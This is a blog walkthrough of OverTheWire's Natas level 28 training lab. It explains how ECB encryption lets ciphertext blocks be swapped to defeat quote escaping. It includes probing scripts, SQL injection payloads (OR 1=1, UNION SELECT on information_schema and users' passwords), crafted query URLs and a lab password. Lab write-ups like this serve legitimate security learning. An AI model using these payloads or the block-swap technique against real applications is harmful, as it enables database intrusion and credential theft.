Nov 15, 2021 12 min read appsec

OverTheWire Natas Level 28 Walkthrough

This level was the hardest for me thus far, and is in fact a mix of web security and cryptography. Cryptography is not my strong suit and I had to lean on other write-ups for this one (vs solving it on my own) after beating my head against the wall. The write-ups are linked at the end of this post. While there’s a lot of value in figuring things out on your own, I feel like I learned quite a bit through reading/watching other people’s walkthroughs.

Writing this walkthrough has also been massively helpful for my own understanding, and I hope it’s useful for others too.

What is Natas?

Natas is an online hacking game meant to help you learn and practice security concepts.

OverTheWire is a website with a number of “war games”, which are online hacking games that allow you to practice security concepts. If you are looking for a beginner introduction to web security (albeit an older tech stack), then Natas is a great place to start.

Natas is hosted on different subdomains following the pattern of http://natas<level#>.natas.labs.overthewire.org. As you progress through the levels, you’ll need to increment the level number in the URL in order to view the correct level.

Each level requires the levels below it to be solved, so you will need the level 28 flag found in level 27 to begin this walkthrough. As before, make sure you keep notes and write down the passwords as you find them!

Level 28 ➔ 29

Open up http://natas28.natas.labs.overthewire.org and login with username natas28 and password 55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ from the previous writeup.

This level begins harmlessly enough, with a database search input similar to what we’ve seen before with the “dictionary.txt” command injection levels.

You can try different queries and see some kinda 😐 jokes:

We aren’t given source code, but it does say that it’s a database. If we try SQL injection by submitting a search query of '… we don’t get anything useful. They must be escaping that character, as we get results back that have literal single quotes in them:

After a couple queries, I realized that, when a POST request is submitted, we’re forwarded to search.php and a huuuge query string is appended to the URL:

http://natas28.natas.labs.overthewire.org/search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPKriAqPE2%2B%2BuYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq%2FLC12hqpypTFRyXA%3D

If we clean up this URL by removing everything up to query= and then URL-decode it, the query looks like this:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKriAqPE2++uYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=

This is a base64-encoded string, but attempts to decode it into something useful using CyberChef proved unfruitful.

Padding Error

From there, I messed around with the string (removing chars, etc.) and got this PKCS#7 padding error:

If you do a Google search for this error, you’ll get a lot of messages about AES, block sizes, and similar cryptographic topics.

As mentioned earlier, I wasn’t familiar enough with cryptography to know exactly what this meant. It seemed like the error was somehow related to an AES block cipher encryption, where 1. there was a fixed block size of data to be encrypted/decrypted, and 2. the information was not conforming to this length, probably because I modified it.

I tried a bunch of queries and noticed that the start of the query was always the same (G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP), as was the end (c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI), given a single-character query:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIkA4mnOUKh8BvERzIoyMYtc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKaJ+w3LEi9VL2x96EIV7z3c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI1ZuexNCnLbVB/YkQXe5JOc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI/dr/07Kww/CqqxthJgd+Ec4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIUfzbKV4Hs4bPdElNkG0UVc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI

My original idea was a padding oracle attack. But given the PKCS#7 error and repeating info, it’s more likely an ECB (electronic code book) cipher mode

This mode is insecure for most applications, because there’s no chaining between blocks, or other dependencies between blocks. Instead, each block of plaintext will be encoding with the key, meaning that every identical plaintext block will result in the same ciphertext block output. In cryptographic terms, this is known as lack of diffusion: the method of encryption does not hide data patterns well.

Something I only noticed after I solved this challenge (while writing this walkthrough) is this useful hint from Wikipedia:

ECB mode can also make protocols without integrity protection even more susceptible to replay attacks, since each block gets decrypted in exactly the same way.

If ECB encrypts blocks individually into cipher blocks, that means that cipher blocks are individually decrypted back into plaintext blocks.

That means means that patterns are clearly visible (a no-no in cryptography) and that we might be able to mix and match blocks to our liking. In other words, a replay attack.

Finding the block size

If we want to swap out blocks and modify the query, we’ll first need to know what the block size is. I originally tried to do this by deleting parts of the query, but scripting turned out to be a much better option.

Here’s my script, which sends one character, then two, then three, and so on up until 16 characters of input:

import requests
import string
from requests.auth import HTTPBasicAuth
import urllib.parse

basicAuth=HTTPBasicAuth('natas28', 'JWwR438wkgTsNKBbcJoowyysdM82YjeF')

u="http://natas28.natas.labs.overthewire.org/index.php"

count = 0
headers = {'Content-Type': 'application/x-www-form-urlencoded' }

while count <= 16:
    data = "query=" + "A"*count
    response = requests.post(u, headers=headers, data=data, auth=basicAuth, verify=False, allow_redirects=True)
    print("{:02d}".format(count), "chars ", urllib.parse.unquote(response.url))
    count += 1

print("Done!")

I’m not worried about the database results, just the query string that is created. The idea is that this somehow maps to a database query that’s being performed using our input.

In the output, you can see three things.

First, the red box shows how the beginning of the string is always the same.
Second, the blue box shows how the next part of the string changes when we go from 9 to 10 chars of user-supplied input.
Third, when the input goes from 11 to 12 chars in length, the overall query length increases.

This increase in length, as well as the length of the chars in the blue box, are roughly the same size. If we take an example string from the blue box, JfIqcn9iVBmkZvmvU4kfmy, it is 22 chars in length (in base64 format) but 16 chars when we base64 decode it.

This tells us that the block size is 16.

Testing out different characters

At this point, we know that the block size is 16, and now we can move on to caring about the actual content of our query.

We also know that it takes 10 characters to change the value of the third block. Before we go any further, let’s recap our current block observations for queries under 10 characters long:

Blocks 1 and 2 are always the same, like they’re the start of the query. Nothing we input will modify this.
Block 3 reflects our actual input*
Block 4 and 5 are always the same (for small inputs with valid characters), like some kind of trailing portion of the query.

What do I mean by “valid characters” and why did I put the asterisk on there?

Because if we try 10 characters and vary the last character to determine a pattern, something weird happens for a few characters.

Here’s the new script loop (using the same format and imports as the script above):

for c in string.printable:
    data = "query=" + "A"*9 + c
    response = requests.post(u, headers=headers, data=data, auth=basicAuth, verify=False, allow_redirects=True)
    newUrl = urllib.parse.unquote(response.url)
    query = newUrl.split("=")[1]
    print(c, "\t", query)

    print("length: ", len(query))
    count += 1

This code will send a query of AAAAAAAAAa, AAAAAAAAAb, AAAAAAAAAc, and so on. The python list of string.printable also includes punctuation such as .!@#$%^&*()'"/.

Here’s the output of strings ending in a, b, and c respectively:

a:  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  IkA4mnOUKh8BvERzIoyMYt  c4pf+0pFACRndRda5Za71v  NN8znGntzhH2ZQu87WJwI
b:  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  KaJ+w3LEi9VL2x96EIV7z3  c4pf+0pFACRndRda5Za71v  NN8znGntzhH2ZQu87WJwI
c:  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  I1ZuexNCnLbVB/YkQXe5JO  c4pf+0pFACRndRda5Za71v  NN8znGntzhH2ZQu87WJwI

Spaces added to visualize the blocks better.

All of the punctuation follows this same pattern (1st and 2nd blocks the same, 4th and 5th blocks the same), with three exceptions:

':  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  IWJ2pwLjKxd0ddiQ3a1c5l  stdkbwCSkbjZzJR1Froznc  qM9OYQkTq645oGdhkgSlo
":  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  IWJ2pwLjKxd0ddiQ3a1c5l  e0uzFQTQyTJF5uPUK3I8gM  qM9OYQkTq645oGdhkgSlo
\:  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  IWJ2pwLjKxd0ddiQ3a1c5l  fN5woKhSkQjlY0g5eVSYnc  qM9OYQkTq645oGdhkgSlo

', ", and \ all have identically 1st, 2nd, 3rd blocks, and 5th blocks.

The educated guess in this scenario is that 1. these punctuation characters are disallowed and being escaped and 2. that modified query is what is showing up in the 3rd block (which up until this point has varied with each input).

In other words, we send in AAAAAAAAA' and it modifies that query to be AAAAAAAAA\' instead.

Strategy

Since the 16-byte blocks are individually encrypted/decrypted, and we have a guess at what behavior is happening when we try to do SQL injection, how can we use this to our advantage?

Let’s revisit the character escaping. Visually, it looks like this. This first block is what we want our query to be, separated into the 5 blocks that we get with a query of this size:

But the program is (probably, as best as we are able to guess) inserting a / in front of the ' and pushing the rest of our query (which at this point, is just the single ') into the next block. Then the program presumably adds padding or something so that it’s a full block’s worth of data to encrypt.

This modifies the remainder of our query (in part due to padding sizes) but more importantly for our SQL injection, it renders our query useless, because the ' that would be creating the injection is being escaped.

Remember that blocks are individually encrypted/decrypted, meaning that we can swap them out. What if we make a malicious query (as we’ve done above, something like AAAAAAAAA' OR 1=1 -- ) and then swap out the block that’s preventing SQL injection? That would look like this:

This is only possible because of the 9 As padding the query. This allows us to get the /' aligned right at the boundary of the 3rd and 4th blocks, such that we can swap out the 3rd block.

Creating our query

With this strategy, we need to collect a few pieces first.

Known good header

We need a “known good” start of the query, which is shown in green above. This is easy to find, as we’ve seen it in every single query thus far:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP

Known good trailer

Second, we need a “known good” trailer. I’m not really sure what the purpose of this is in terms of how it might fit into a SQL query, but it seems to be important. This is represented by the blue block(s) above. A known good trailer is as follows:

c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

Dummy block

Third, we need a “dummy” block. This is the block that we will swap out in place of the escaped character that occurs in the third block in the diagrams above. The dummy block is represented in gray. If we make a query of 10 spaces, we get a query string (URL-decoded) of:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

We recognize the first two blocks as the “known good” header, and the last two blocks as the “known good” trailer, so if we remove those, we’re left with a dummy block of :

ItlMM3qTizkRB5P2zYxJsb

Known bad third block

We know that a single quote causes some kind of change in the third block. If we know exactly what this block looks like, it’ll be easier to remove it later.

If we do a query for AAAAAAAAA' as in the experiments earlier in this post, we see that the third block is IWJ2pwLjKxd0ddiQ3a1c5l. This is our “known bad” value.

Query formula

The last piece is our SQL injection, which we’ll get to in just a minute. First let’s talk about the formula of the query. We will submit a query with AAAAAAAAA' (9 A’s and then a single quote), followed by our SQL injection.

For example, we’ll send: AAAAAAAAA' OR 1=1 --

We’ll take this query, and deconstruct it (mentally) into a structure like:

[known good header] [block we know contains a / to escape our SQL injection] [SQL injection and trailer]

We’ll then use CyberChef or another editor to take the third block out (the one with the /) and replace it with our dummy block. We’ll also copy/paste our original trailer at the end:

[known good header] [dummy block] [SQL injection] [known good trailer]

This will need to be fully URL-encoded. I say “fully” because some Python implementations do not substitute out all characters (I used CyberChef instead).

This entire process is shown in the graph below. The pink text represents the first request, which we assume has some kind of escaping character (like /) in it. We overwrite that block with our dummy block, and then resend the entire request.

Are there more graceful ways of doing this? Probably. But manually editing the queries helped reduce the amount of abstraction for me. It’s still pretty abstract though, so let’s work through some examples.

‘ OR 1=1 —

The “hello world” of SQL injection is getting all records to be returned using ' OR 1=1 --. Let’s try it out.

First, we make our query with 9 A’s, then our SQL injection:

AAAAAAAAA' OR 1=1 --

The program will insert a / and this will push the ‘ into the next block (since it takes 10 characters to fill up the block, 9 A‘s and a / = 10 chars). We will effectively have sent this query:

AAAAAAAAA/' OR 1=1 --

Copy paste the original query of AAAAAAAAA' OR 1=1 -- (don’t miss the space at the end!) and try it out in the database search. You should get a URL query of:

http://natas28.natas.labs.overthewire.org/search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPIvcyrxjhb4D1smChUE%2FAaCs1j%2F6bcmnQre%2FN2GUxOg60HAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b%2BK

URL decode this and remove the start of the URL up to the =. The result is:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIWJ2pwLjKxd0ddiQ3a1c5lWY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b+K

Remove the known good header (G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP) and the known bad block (IWJ2pwLjKxd0ddiQ3a1c5l). That leaves us with the encrypted SQL injection query:

WY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b+K

Now, we need to reconstruct our query:

Known good header: G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP
Dummy block: ItlMM3qTizkRB5P2zYxJsb
SQL injection: WY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b+K
Known good trailer: c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

Redundant? Yes. Scriptable? Also yes. But oh well. Concatenate these strings together, remove new lines, and you get:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbWY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b+Kc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

URL encode this, and submit it as a query:

http://natas28.natas.labs.overthewire.org/search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbWY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b%2BKc4pf%2B0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI%3D

We seem to get a lot of results back, so I think it worked!

Discovering database schema

Now that we’ve got a working proof of concept, let’s try to learn about the database schema with a query like ' UNION SELECT table_name FROM information_schema.tables; -- . With our A-padding:

AAAAAAAAA' UNION SELECT table_name FROM information_schema.tables; --

This translates into a query string of:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIWJ2pwLjKxd0ddiQ3a1c5lr0T1ii+Ysw9O0BMRL2Q9HUY+Hp7DfIbgLrY9HzzScnSwiwIQQLHbuTybkf0vfvyOoqRnCxfnbDr4842Rxdxh1GSGlUrqRvuT6auFhFtPS9DX/ytyVFP8KUcB5R9dfA+O

Take out the first three blocks (header and bad block) and you get this:

r0T1ii+Ysw9O0BMRL2Q9HUY+Hp7DfIbgLrY9HzzScnSwiwIQQLHbuTybkf0vfvyOoqRnCxfnbDr4842Rxdxh1GSGlUrqRvuT6auFhFtPS9DX/ytyVFP8KUcB5R9dfA+O

Then add the header and dummy block back in, append the trailer at the end and you get (line breaks for clarity):

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP
ItlMM3qTizkRB5P2zYxJsb
r0T1ii+Ysw9O0BMRL2Q9HUY+Hp7DfIbgLrY9HzzScnSwiwIQQLHbuTybkf0vfvyOoqRnCxfnbDr4842Rxdxh1GSGlUrqRvuT6auFhFtPS9DX/ytyVFP8KUcB5R9dfA+O
c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

Now URL encode, and you get this query:

http://natas28.natas.labs.overthewire.org/search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbr0T1ii%2BYsw9O0BMRL2Q9HUY%2BHp7DfIbgLrY9HzzScnSwiwIQQLHbuTybkf0vfvyOoqRnCxfnbDr4842Rxdxh1GSGlUrqRvuT6auFhFtPS9DX%2FytyVFP8KUcB5R9dfA%2BOc4pf%2B0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI%3D

Here’s the relevant database tables:

We have a jokes table, and a users table. The rest is standard MySQL tables that we can ignore.

Natas Level 28 Solution

At this point, you could another query to figure out what columns exist, but all the past levels have included username and password. So I’ll take a guess that our final SQL injection query will be:

' UNION SELECT ALL password FROM users; --

With the padding:

AAAAAAAAA' UNION SELECT ALL password FROM users; --

Send that as an input to get this encrypted query string:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIWJ2pwLjKxd0ddiQ3a1c5l+76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons=

After URL decoding, remove the first three blocks (header and bad block):

+76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons=

Add the header and dummy block back to the front, and the trailer on the end:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP ItlMM3qTizkRB5P2zYxJsb +76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons= c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

This actually gave me some trouble, so I base64-decoded each of the sections in CyberChef, and used the resulting hex output in a new query where I re-encoded it as base64, then URL encoded it:

The resulting query is:

G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsb%2B76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ%2FOntzil%2F7SkUAJGd1F1rllrvW803zOcae3OEfZlC7ztYnAg%3D%3D

And yes, once again, this could be done programmatically. But once I figured out what I wanted to do conceptually, I was able to do it quickly enough with CyberChef and never made it into a script.

Here’s our password:

Takeaway: ECB is not secure, since we were able to swap out blocks to our liking.